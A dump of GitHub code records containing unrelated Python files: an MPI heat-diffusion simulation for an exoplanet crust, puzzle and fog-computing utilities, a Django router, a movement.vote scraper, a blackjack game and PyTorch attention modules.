0.5*min(ad,al)**2/alpha\n print('dt adjusted to {}'.format(dt))\n sys.stdout.flush()\nfor t in np.arange(ti, tf+dt, dt):\n # Randomly choose if a flare happens; if yes, pick from the flare list. \n if np.random.rand() < flare_prob:\n idx = np.random.randint(elen)\n flare_change = flare_factor[idx]\n print('Careful, flare at t = %.2f days! id = %i, Tchange = %.2E K '%(\n t, idx, flare_factor[idx]))\n else:\n flare_change = 0\n \n\n # periodic heating at surface with phase shift (INCORRECT ON SUB-DAY TIMESCALE)\n phase = np.arange(Nl)/Nl\n crust[0] = Tinit + Tvar*np.sin(2*np.pi*(t/tyear+phase)) + Temp_day*np.sin(2*np.pi*(t/tday + phase)) + flare_change\n\n crust_thistask = crust[:,index_low:index_high]\n nrow, ncol = np.shape(crust_thistask)\n #print('Shape of crust_thistask is= {}, in task = {}'.format(np.shape(crust_thistask), ThisTask))\n #sys.stdout.flush()\n\n print('Parallelization begins......')\n sys.stdout.flush()\n\n if ThisTask == 0 : #rank == 0\n for i in range(1,nrow-1):\n for j in range(0,ncol-1):\n if ((j-1) < index_low):\n #cell_left = comm.irecv(source = Ntasks-1, tag = Ntasks-1)\n #print('Left cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, Ntasks-1))\n #sys.stdout.flush()\n #cell_right = crust_thistask[i,j+1]\n cell_left = np.zeros(1)\n comm.isend(crust_thistask[i,j], dest = Ntasks-1, tag = 0)\n #print('Right cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, Ntasks-1))\n #sys.stdout.flush()\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_left_req = comm.irecv(cell_left, source = Ntasks-1, tag = Ntasks-1)\n #cell_left_req.wait()\n #print('Left cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, Ntasks-1))\n #sys.stdout.flush()\n cell_left = cell_left[0]\n cell_right = crust_thistask[i,j+1]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n elif ((j+1) > index_high):\n cell_left = crust_thistask[i,j-1]\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_right = np.zeros(1)\n cell_right_req = comm.irecv(cell_right, source = 1, tag = 1)\n #cell_right_req.wait()\n #print('Right cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, 1))\n #sys.stdout.flush()\n cell_right = cell_right[0]\n comm.isend(crust_thistask[i,j], dest = 1, tag = 0)\n #print('Left cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, 1))\n #sys.stdout.flush()\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n else:\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n cell_right = crust_thistask[i,j+1]\n cell_left = crust_thistask[i,j-1]\n #print('This is not a edge cell at task {}'.format(ThisTask))\n #sys.stdout.flush()\n crust_thistask[i,j] = crust_thistask[i,j] + dt * alpha * \\\n ( (cell_upper + cell_lower - 2 * crust_thistask[i,j] ) / ad**2 + \\\n (cell_right + cell_left - 2 * crust_thistask[i,j]) / al**2 )\n\n\n\n\n elif ThisTask != 0 :\n for i in range(1,nrow-1):\n for j in range(0,ncol-1):\n if ((j-1) < index_low):\n comm.isend(crust_thistask[i,j], dest=ThisTask-1, tag = ThisTask)\n #print('Right cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, ThisTask-1))\n #sys.stdout.flush()\n cell_left = np.zeros(1)\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_left_req = comm.irecv(cell_left, source = ThisTask-1, tag = ThisTask-1)\n #cell_left_req.wait()\n #print('Left cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, ThisTask-1))\n 
#sys.stdout.flush()\n cell_left = cell_left[0]\n cell_right = crust_thistask[i,j+1]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j] \n elif ((j+1) > index_high): #if left cell needs to come from another task\n if (ThisTask < Ntasks-1):\n comm.isend(crust_thistask[i,j], dest = ThisTask+1, tag=ThisTask) #This is right edge, send to next task as left cell\n #print('Left cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, ThisTask+1))\n #sys.stdout.flush()\n cell_left = crust_thistask[i,j-1]\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_right = np.zeros(1)\n cell_right_req = comm.irecv(cell_right, source = ThisTask+1, tag = ThisTask+1)\n #print('Right cell received at task {} of {} from task {}'.format(ThisTask-1, Ntasks, ThisTask+1))\n #sys.stdout.flush()\n cell_right = cell_right[0]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n else:\n comm.isend(crust_thistask[i,j], dest = 0, tag=ThisTask)\n cell_left = crust_thistask[i,j-1]\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_right = np.zeros(1)\n cell_right_req = comm.irecv(cell_right, source = 0, tag = 0)\n #cell_right_req.wait()\n #print('Right cell received at task {} of {} from task {}'.format(ThisTask-1, Ntasks, ThisTask+1))\n #sys.stdout.flush()\n cell_right = cell_right[0]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n # elif ((j-1) < index_low):\n # comm.isend(crust_thistask[i,j], dest=ThisTask-1, tag = ThisTask)\n # cell_left = comm.irecv(source = ThisTask-1, tag = ThisTask-1)\n # cell_right = crust_thistask[i,j+1]\n else:\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n cell_right = crust_thistask[i,j+1]\n cell_left = crust_thistask[i,j-1]\n #print('This is not a edge cell at task {}'.format(ThisTask)) \n #sys.stdout.flush()\n crust_thistask[i,j] = crust_thistask[i,j] + dt * alpha * \\\n ( (cell_upper + cell_lower - 2 * crust_thistask[i,j] ) / ad**2 + \\\n (cell_right + cell_left - 2 * crust_thistask[i,j]) / al**2 )\n\n\n crust_combined = comm.gather(crust_thistask, root = 0)\n print('Parallelization ends......')\n sys.stdout.flush()\n\n \n if (ThisTask == 0):\n #print('Shape of combined data = {}'.format(np.shape(crust_combined)))\n crust_combined = np.array(crust_combined, float)\n crust = np.zeros((Nd,Nl), float)\n #print('Shape of crust = {}'.format(np.shape(crust)))\n # index_low = i*del_index\n # index_high = (i+1) * del_index\n for i in range(np.shape(crust_combined)[0]):\n index_low = int(i*del_index)\n index_high = int((i+1) * del_index)\n #print('i, index_low, index_high = {},{},{}'.format(i, index_low, index_high))\n crust[:,index_low:index_high] = crust_combined[i,:] \n \n #print('FINAL RESULT AFTER PARALLELIZATION HAS SHAPE OF {}'.format(np.shape(crust)))\n \n if t%(tyear//5) == 0:\n crust_3d = np.zeros((Nw,Nl,Nd), float)\n \n for i in range(Nw):\n crust_3d[i,:,:] = crust.T\n \n nx, ny, nz = Nw, Nl, Nd\n Lx, Ly, Lz = nx-1, ny-1, nz-1\n x,y,z = get_grid(nx, ny, nz, Lx,Ly,Lz) # generate a grid with mesh size Δx = Δy = Δz = 1\n T = init_T(x,y,z, crust_3d)\n filename = 'test_parallel/tempevolution_plots/proxima_b_test/temp'+str(count).zfill(3)+'.png'\n plot_grid(x,y,z,T, t, filename)\n count += 1\n\n 
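# ----------------------------------------------------------------------\n# Editor's note -- illustrative sketch only, never called by this script.\n# The irecv() calls inside the update loops above are used without wait(),\n# so a halo cell can be read before the neighbour's data has arrived. A\n# simpler, deadlock-free pattern swaps one whole edge column per time step\n# with mpi4py's paired sendrecv(). The helper name and the periodic\n# wrap-around are the editor's assumptions, inferred from the\n# rank 0 <-> rank Ntasks-1 exchanges above.\ndef _exchange_halo_sketch(comm, local_block):\n rank, size = comm.Get_rank(), comm.Get_size()\n left, right = (rank - 1) % size, (rank + 1) % size\n # send my leftmost column left; in the same call receive the right\n # neighbour's leftmost column back as my right-side halo\n halo_right = comm.sendrecv(local_block[:, 0], dest=left, sendtag=0, source=right, recvtag=0)\n # send my rightmost column right; receive my left-side halo in exchange\n halo_left = comm.sendrecv(local_block[:, -1], dest=right, sendtag=1, source=left, recvtag=1)\n return halo_left, halo_right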
\n","repo_name":"niranjancroy/exoplanet_heat","sub_path":"heat_ftcs_parallel.py","file_name":"heat_ftcs_parallel.py","file_ext":"py","file_size_in_byte":13358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"69924023200","text":"# coding: utf-8\n\nimport numpy as np\n\n\ndef _convert_puzzle_to_dict(puzzle):\n\tmap = {}\n\tfor x, row in enumerate(puzzle):\n\t\tfor y, cell in enumerate(row):\n\t\t\tmap[(x, y)] = cell\n\treturn map\n\n\ndef _convert_list_to_dict(list, size):\n\tmap = {}\n\tfor y in range(size):\n\t\tfor x in range(size):\n\t\t\tmap[(x, y)] = list[x * size + y]\n\treturn map\n\n\ndef _convert_to_array(dict, size):\n\tarray = np.array([0] * size * size).reshape(size, size)\n\tfor (x, y), value in dict.items():\n\t\tarray[x][y] = value\n\treturn array\n\n\ndef get_key(dict, needle):\n\tfor key, value in dict.items():\n\t\tif value == needle:\n\t\t\treturn key\n\treturn None\n\ndef _convert_puzzle_to_list(puzzle):\n\tlst = [number for line in puzzle for number in line]\n\treturn (lst)\n","repo_name":"toferrari/N-Puzzle","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18079843660","text":"def maior (*num):\n pos = 0\n maiorValor = - 9999\n\n while(pos < len(num)):\n\n if(num[pos]> maiorValor):\n\n maiorValor = num[pos]\n pos += 1\n\n print(maiorValor)\n\nmaior(2,7,10,25,37,45,-20)","repo_name":"Gleytton/Curso_em_Video_Python","sub_path":"99.py","file_name":"99.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25261223726","text":"#!/usr/bin/env python3\n\n################################################################\n# Exports a text file in json format to be imported as a list\n################################################################\n\nimport json\nimport sys\nimport os\n\n# get script path from arguments\npath = str(sys.argv[0])\npath_list = list(path.split(\"/\"))\n\n# build a relative path excluding the last argument\nrel_path = ''\nfor path in path_list[0:-1]:\n rel_path = rel_path + path + os.sep\n\n# Use that as the basis for importing the file\nfilename = f\"{rel_path}files/numbers.json\"\n\nnumbers = [2, 3, 5, 7, 11, 13]\n\nwith open(filename, 'w') as f:\n json.dump(numbers, f)\n","repo_name":"gerryw1389/python","sub_path":"learning/base-language/read-write-files/write-text/write-json-list.py","file_name":"write-json-list.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"43468114810","text":"import fogNode\r\nimport fogUser\r\nimport random\r\nimport constants\r\nimport numpy as np\r\n\r\n### A MODULE CONTAINING SOME USEFUL FUNCTIONS USED IN VARIOUS ASPECTS THE SYSTEM ###\r\n\r\ndef initalize(k, u):\r\n # initalizing 2 lists. One of k fogNodes and one of u fogUsers\r\n nodes = [];\r\n users = [];\r\n for i in range(k):\r\n temp = fogNode.fogNode(i);\r\n nodes.append(temp)\r\n for i in range(u):\r\n temp = fogUser.fogUser(k);\r\n users.append(temp);\r\n return nodes, users;\r\n \r\n\r\ndef generateDistances(start, end, k, u):\r\n # returning a 2d list with distances between every node and every user. 
Rows represent nodes and columns represent users\r\n # inputs are the minimum and maximum distance (start and end) non-inclusive and the number of nodes, k and users, u\r\n lista = [];\r\n for i in range(k):\r\n row = [];\r\n for j in range(u):\r\n temp = random.randrange(start, end) + random.random();\r\n row.append(temp);\r\n lista.append(row);\r\n \r\n return np.array(lista)\r\n\r\n\r\ndef computePUK(distArray, k, theta):\r\n # Calculate the Puk value for every possible pair of Node and User. Inputs are the distance array, its number of rows, and the theta factor\r\n lista = [];\r\n for i in range(k):\r\n distRow = distArray[i];\r\n maxRow = max(distRow)\r\n distRowNormalized = distRow / maxRow;\r\n finalRow = np.power(distRowNormalized, theta)\r\n lista.append(finalRow);\r\n return np.array(lista);\r\n \r\ndef computeGUK(distArray, theta):\r\n # calculate the Guk value for every possible pair of Node and User. Inputs are the distance array and the theta factor\r\n newArray = 1 / distArray;\r\n return np.power(newArray, theta);\r\n\r\ndef firstRound(k, u):\r\n # a random assignment of each user to a node for the first round. Returns an array of size u with the node number.\r\n lista = [];\r\n for i in range(u):\r\n lista.append(random.randrange(k));\r\n return lista;\r\n\r\ndef indices(lista, element):\r\n # given a list @lista and an element @element, return a list of all the indices in which @element occurs\r\n return [index for index, value in enumerate(lista) if value == element]\r\n\r\n\r\ndef computeRUK(nodeList, puks, guks, curNodeList, k, u):\r\n # computing the RUK values\r\n lista = [];\r\n for i in range(u):\r\n nodeIndex = curNodeList[i];\r\n node = nodeList[nodeIndex];\r\n usersOnNode = indices(curNodeList, nodeIndex);\r\n usersOnNode.remove(i);\r\n mysum = 0;\r\n for user in usersOnNode:\r\n mysum += puks[nodeIndex][user] * guks[nodeIndex][user];\r\n toLog = 1 + (puks[nodeIndex][i] * guks[nodeIndex][i]) / (constants.G0 + mysum) \r\n ruk = node.WK * np.log2(toLog)\r\n lista.append(ruk);\r\n \r\n return np.array(lista);\r\n\r\ndef computeFUK(nodeList, userList, curNodeList, k, u, RBTSScores):\r\n # computing the FUK values\r\n lista = [];\r\n accScore = sum(RBTSScores);\r\n if accScore == 0:\r\n factors = np.ones(u);\r\n else:\r\n factors = RBTSScores / accScore;\r\n \r\n for i in range(u):\r\n nodeIndex = curNodeList[i];\r\n node = nodeList[nodeIndex];\r\n usersOnNode = indices(curNodeList, nodeIndex);\r\n phiSum = 0;\r\n iotaSum = 0;\r\n for user in usersOnNode:\r\n phiSum += userList[user].ongoingTask[1]\r\n iotaSum += userList[user].ongoingTask[0];\r\n fuk = userList[i].ongoingTask[1] / phiSum \r\n fuk *= 1 - iotaSum / node.BK;\r\n fuk *= node.FK;\r\n fuk *= factors[i];\r\n \r\n lista.append(fuk)\r\n \r\n return np.array(lista);\r\n\r\n\r\ndef computeTimeOverheads(userList, ruks, fuks):\r\n # computing time overheads, i.e. the time to transmit and process the task\r\n lista = [];\r\n for i in range(len(userList)):\r\n overhead = userList[i].ongoingTask[0] / ruks[i] + userList[i].ongoingTask[2] / fuks[i] \r\n lista.append(overhead);\r\n \r\n return np.array(lista);\r\n\r\ndef computeEnergyOverheads(userList, u, curNodeList, puks, ruks):\r\n # compute the energy overheads, i.e. 
the amount of power we spend to complete the task\r\n lista = [];\r\n for i in range(u):\r\n nodeIndex = curNodeList[i];\r\n EO = userList[i].ongoingTask[0] * puks[nodeIndex][i] / ruks[i];\r\n lista.append(EO);\r\n \r\n return np.array(lista);\r\n\r\ndef addIUS(userList):\r\n # return the sum of all Itus from a list of users\r\n sumI = 0;\r\n for user in userList:\r\n sumI += user.ongoingTask[0];\r\n \r\n return sumI;\r\n\r\ndef randomVector(size):\r\n # returns a vector of size @size with random numbers\r\n lista = [];\r\n for i in range(size):\r\n lista.append(random.random());\r\n \r\n return np.array(lista);\r\n\r\ndef RQ(y, x):\r\n # the RQ functions as described in the WriteUp\r\n if x == 1:\r\n return 2 * y - pow(y, 2);\r\n elif x == 0:\r\n return 1 - pow(y,2);\r\n \r\n \r\ndef rewardsRange(normalizedRewards, newMax, newMin):\r\n lista = [];\r\n size = len(normalizedRewards);\r\n \r\n oldMax = max(normalizedRewards);\r\n oldMin = min(normalizedRewards);\r\n \r\n newRange = newMax - newMin;\r\n oldRange = oldMax - oldMin;\r\n \r\n if oldRange == 0:\r\n return np.ones(size) * (newMax + newMin) / 2\r\n \r\n for reward in normalizedRewards:\r\n lista.append((((reward - oldMin) * newRange)/ oldRange) + newMin)\r\n \r\n return np.array(lista)","repo_name":"stavros2/Thesis","sub_path":"src/compFunctions.py","file_name":"compFunctions.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74346626077","text":"from django.conf.urls import patterns, include, url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom .views import PersonViewSet, OrganizationViewSet, MembershipViewSet, PostViewSet, AreaViewSet\nfrom .routers import DefaultPopsRouter\n\n# Routers provide an easy way of automatically determining the URL conf\nrouter = DefaultPopsRouter()\n\nrouter.register(r'persons', PersonViewSet)\nrouter.register(r'organizations', OrganizationViewSet)\nrouter.register(r'memberships', MembershipViewSet)\nrouter.register(r'posts', PostViewSet)\nrouter.register(r'areas', AreaViewSet)\n\n\nurlpatterns = patterns('',\n # django-rest-frameworks urls\n url(r'^', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n)\n\n","repo_name":"openpolis/op_api3","sub_path":"api_project/pops/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"9635968673","text":"# def search(data,key,min,max):\n# mid = int((min + max) / 2)\n# if data[mid] == key:\n# return mid\n# elif data[mid] > key:\n# max = mid -1\n# return search(data, key, min, max)\n# else:\n# min = mid + 1\n# return search(data, key, min, max)\n\n\ndef search2(data, key):\n min = 0\n max = len(data) - 1\n\n while max >= min:\n mid = int((min+max) / 2)\n if data[mid] == key :\n return mid\n elif data[mid] > key :\n max = mid - 1\n else:\n min = mid + 1\n\n\n\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nkey = 7\n\n# print(search(data,7,0,len(data)-1))\n\nprint( search2(data, key))","repo_name":"HSUHAOBM/Python_note","sub_path":"other/practise/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74038664797","text":"import urllib.request\nimport csv\nimport json\n\nfrom bs4 import BeautifulSoup\n\nSTATES_TO_CODE = {\n 
'Alabama': 'AL',\n 'Alaska': 'AK',\n 'American Samoa': 'AS',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Guam': 'GU',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Northern Mariana Islands':'MP',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Puerto Rico': 'PR',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virgin Islands': 'VI',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY'\n}\n\nMOVEMENTVOTE_URL = \"https://movement.vote/groups\" # this is a gatsby site, so doesn't have the full body hydrated\n# loaded it in a real browser and then saved to \nMOVEMENTVOTE_FILE = \"movementvote.html\"\nREQUEST_HEADERS = {'User-Agent' : \"bot\"}\nDESIRED_FIELDS = ['name', 'state', 'description', 'website', 'donation_url', 'logo_url', 'issues']\n\ndef get_page(url):\n request = urllib.request.Request(url, headers=REQUEST_HEADERS)\n connect = urllib.request.urlopen(request)\n return BeautifulSoup(connect.read(), 'html.parser')\n\ndef get_data(doc):\n data = []\n orgs_section = doc.find(\"section\", {\"class\": \"orgs-section\"})\n orgs_list = orgs_section.find(\"div\", {\"class\": \"orgs-list\"})\n for org in orgs_list.find_all(\"div\", {\"class\" : \"org\"}):\n state_name = org.find(\"div\", {\"class\": \"org-states\"}).get_text().strip()\n state_name = state_name.replace(\"National Groups\", \"\").replace(',','').strip()\n state = STATES_TO_CODE.get(state_name)\n name = org.find(\"div\", {\"class\": \"org-title\"}).get_text().strip()\n description = org.find(\"div\", {\"class\": \"org-content\"}).get_text().strip()\n image = org.find(\"img\", {\"class\": \"org-image\"})\n website = org.find(\"a\", {\"class\": \"org-link-web\"}, href=True)\n donate = org.find('a', {\"class\": \"org-link-donate\"}, href=True)\n org_tags = org.find(\"div\", {\"class\": \"org-tags\"})\n\n d = {\n 'name': name,\n 'state': state,\n 'description': description\n }\n if image:\n d['logo_url'] = image['src']\n if website:\n d['website'] = website['href']\n if donate:\n d['donation_url'] = donate['href'].replace('refcode=mvpsite', 'refcode=crush2020')\n if org_tags:\n first_tag = org_tags.find(\"div\", {\"class\": \"tagblock\"})\n if first_tag and first_tag.get_text().startswith(\"Issue Areas:\"):\n issues = first_tag.get_text().replace(\"Issue Areas: \", \"\").strip()\n d['issues'] = issues\n \n data.append(d)\n print(len(data))\n return data\n\ndef write_page(data, writer):\n for row in data:\n out_row = {k: v for k, v in row.items() if k in DESIRED_FIELDS}\n writer.writerow(out_row)\n\nwith open('../movementvote.csv', 'w') as out_file:\n out_writer = csv.DictWriter(out_file, fieldnames=DESIRED_FIELDS)\n out_writer.writeheader()\n\n # doc = get_page(MOVEMENTVOTE_URL)\n file = open(MOVEMENTVOTE_FILE, 'r')\n doc = BeautifulSoup(file.read(), 
'html.parser')\n write_page(get_data(doc), out_writer)\n\n print(\"done\")\n","repo_name":"spacedogXYZ/crush2020","sub_path":"data/scripts/get_movementvote.py","file_name":"get_movementvote.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73043699039","text":"import random\r\nimport os\r\n\r\nlogo = \"\"\"\r\n.------. _ _ _ _ _ \r\n|A_ _ |. | | | | | | (_) | | \r\n|( \\/ ).-----. | |__ | | __ _ ___| | ___ __ _ ___| | __\r\n| \\ /|K /\\ | | '_ \\| |/ _` |/ __| |/ / |/ _` |/ __| |/ /\r\n| \\/ | / \\ | | |_) | | (_| | (__| <| | (_| | (__| < \r\n`-----| \\ / | |_.__/|_|\\__,_|\\___|_|\\_\\ |\\__,_|\\___|_|\\_\\\\\r\n | \\/ K| _/ | \r\n `------' |__/ \r\n\"\"\"\r\n\r\ndef deal_card():\r\n \"\"\"Returns a random card from the deck.\"\"\"\r\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\n card = random.choice(cards)\r\n return card\r\n\r\n\r\ndef calculate_score(cards):\r\n if sum(cards) == 21 and len(cards) == 2:\r\n return 0\r\n if 11 in cards and sum(cards) > 21:\r\n cards.remove(11)\r\n cards.append(1)\r\n return sum(cards)\r\n\r\n\r\ndef compare(user_score, computer_score):\r\n if user_score == computer_score:\r\n return \"It's a DRAW 😶\"\r\n elif computer_score == 0:\r\n return \"You lose! Opponent has a blackjack\"\r\n elif user_score == 0:\r\n return \"You win with a blackjack 😎\"\r\n elif user_score > 21:\r\n return \"You went over. You lose!\"\r\n elif computer_score > 21:\r\n return \"Opponent went over. You WIN\"\r\n elif user_score > computer_score:\r\n return \"You win 🙂\"\r\n else:\r\n return \"You lose 😯\"\r\n\r\n\r\ndef play_game():\r\n print(logo)\r\n user_cards = []\r\n computer_cards = []\r\n con_game = True\r\n\r\n for _ in range(2):\r\n user_cards.append(deal_card())\r\n computer_cards.append(deal_card())\r\n\r\n while con_game:\r\n user_score = calculate_score(user_cards)\r\n computer_score = calculate_score(computer_cards)\r\n print(f\" Your cards: {user_cards}, score is: {user_score}\")\r\n print(f\" The computer's first card: {computer_cards[0]}\")\r\n if user_score == 0 or computer_score == 0 or user_score > 21:\r\n con_game = False\r\n else:\r\n user_should_deal = input(\"Type 'y' to take a new card or 'n' to pass: \")\r\n if user_should_deal == 'y':\r\n user_cards.append(deal_card())\r\n else:\r\n con_game = False\r\n\r\n while computer_score != 0 and computer_score < 17:\r\n computer_cards.append(deal_card())\r\n computer_score = calculate_score(computer_cards)\r\n\r\n print(f\"Your final hand is: {user_cards} and score is: {user_score}\")\r\n print(f\"The opponent's final hand is: {computer_cards} and score is: {computer_score}\")\r\n print(compare(user_score, computer_score))\r\n\r\n\r\nwhile input(\"Do you want to play a game of blackjack? 
Type 'y' or 'n': \") == 'y':\r\n os.system('cls')\r\n play_game()","repo_name":"aleesain/python","sub_path":"mini_game_blackjack.py","file_name":"mini_game_blackjack.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38356148980","text":"\"\"\"\nThis file contains the self attention and the multi attention modules\n\nDescription :\nThe Network being implemented here produces context aware representation by applying attention to\neach pair of tokens from the input sequence\n\nThe idea is to use this network to predict the top n goals to use\nfor resubstitution in the Hindsight experience replay\n\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef multiplicative_fn( x, q, linear_x, linear_q):\n \"\"\"\n\n :param x: Input token\n :param q: Query vector\n :param linear_x: Weight matrix for x\n :param linear_q: Weight matrix for query\n :return: compatibility function\n \"\"\"\n\n # Return the cosine similarity\n x_ = linear_x(x)\n q_ = linear_q(q)\n f = F.cosine_similarity(x_, q_)\n return f\n\n\ndef additive_fn( x, q, linear_x, linear_q, out_linear, num_hidden, activation):\n \"\"\"\n\n :param x: Input token\n :param q: Query vector\n :param linear_x: Weight matrix for x\n :param linear_q: Weight matrix for query\n :param num_hidden: Number of hidden layers\n :param activation: The Non linear activation function to use\n :return: compatibility function\n \"\"\"\n\n # Additive attention achieves better empirical performance\n x_ = linear_x(x)\n q_ = linear_q(q)\n o = out_linear(activation(x_ + q_))\n return o\n\n\nclass VanillaAttention(nn.Module):\n \"\"\"\n The standard attention module\n Vanilla Attention computes alignments scores of the query to each\n of the input tokens in an input sequence.\n \"\"\"\n def __init__(self, input_dim, query_dim, num_hidden, embedding_dim,\n activation, output_features,\n use_additive=True, save_attention=False,\n attention_dict=None, name=None):\n \"\"\"\n\n :param input_dim: The input dimension of the sequence or length of the sequence\n :param query_dim: The dimension of the query embedding - Current State || Desired Goal Vector\n :param num_hidden: The number of hidden layers in the network\n :param embedding_dim: The dimension of each embedding - State || Achieved Goal Vector\n :param activation: The non-linear activation function to use\n :param use_additive_fn: Boolean to determine whether to use additive or multiplicative attention\n \"\"\"\n super(VanillaAttention, self).__init__()\n self.input_dim = input_dim # n\n self.query_dim = query_dim # q\n self.num_hidden = num_hidden # h\n self.embedding_dim = embedding_dim # e\n self.output = output_features\n self.additive = use_additive\n self.activation = activation\n self.save_attention = save_attention\n self.attention_dict = attention_dict\n self.name = name\n\n # Define the linear layers\n self.linear_x = nn.Linear(in_features=embedding_dim, out_features=num_hidden)\n self.linear_q = nn.Linear(in_features=query_dim, out_features=num_hidden)\n self.out_linear = nn.Linear(in_features=num_hidden, out_features=output_features)\n self.output_softmax_scores = nn.Softmax()\n\n def forward(self, input_sequence, query_vector):\n # Returns the alignment scores\n if self.additive:\n s = additive_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q, num_hidden=self.num_hidden, activation=self.activation,\n out_linear=self.out_linear)\n 
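# (editor's note) the additive branch scores tokens with out_linear(activation(linear_x(x) + linear_q(q))), i.e. Bahdanau-style additive attention;\n # the multiplicative branch below instead scores with the cosine similarity of the two linear projections\n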
 else:\n s = multiplicative_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q)\n\n scores = self.output_softmax_scores(s)\n # A large score here for a particular x (embedding) means that it contributes\n # important information to the given query vector\n # Dimension of scores -> b x n\n expectations_of_sampling = torch.sum(torch.mul(scores, input_sequence))\n if self.save_attention:\n if self.name is not None and self.attention_dict is not None:\n self.attention_dict[self.name] = scores\n return scores, expectations_of_sampling\n\n # Weights Initialization\n def init_weights(self, init_range=0.1):\n self.linear_x.weight.data.uniform_(-init_range, init_range)\n self.linear_q.weight.data.uniform_(-init_range, init_range)\n self.out_linear.weight.data.uniform_(-init_range, init_range)\n\n\nclass MultiAttention(nn.Module):\n \"\"\"\n The Multi Attention module\n\n Alignment Score computed for each feature\n\n Score of a token pair is a vector rather than a scalar\n\n Has embedding_dim indicators for embedding_dim features\n Each indicator has a probability\n distribution that is generated by applying softmax to\n the n alignment scores of the corresponding feature.\n\n\n \"\"\"\n def __init__(self, input_dim, embedding_dim, query_dim, num_hidden,\n activation, output_features,\n use_additive=True, save_attention=False,\n attention_dict=None, name=None):\n \"\"\"\n :param input_dim: The input dimension of the sequence or length of the sequence\n :param query_dim: The dimension of the query embedding - Current State || Desired Goal Vector\n :param num_hidden: The number of hidden layers in the network\n :param embedding_dim: The dimension of each embedding - State || Achieved Goal Vector\n :param activation: The non-linear activation function to use\n :param use_additive: Boolean to determine whether to use additive or multiplicative attention\n \"\"\"\n super(MultiAttention, self).__init__()\n self.input_dim = input_dim\n self.query_dim = query_dim\n self.embedding_dim = embedding_dim\n self.num_hidden = num_hidden\n self.activation = activation\n self.additive = use_additive\n self.out_features = output_features\n self.save_attention = save_attention\n self.attention_dict = attention_dict\n self.name = name\n\n # Define the linear layers\n self.linear_x = nn.Linear(in_features=embedding_dim, out_features=num_hidden)\n self.linear_q = nn.Linear(in_features=query_dim, out_features=num_hidden)\n self.out_linear 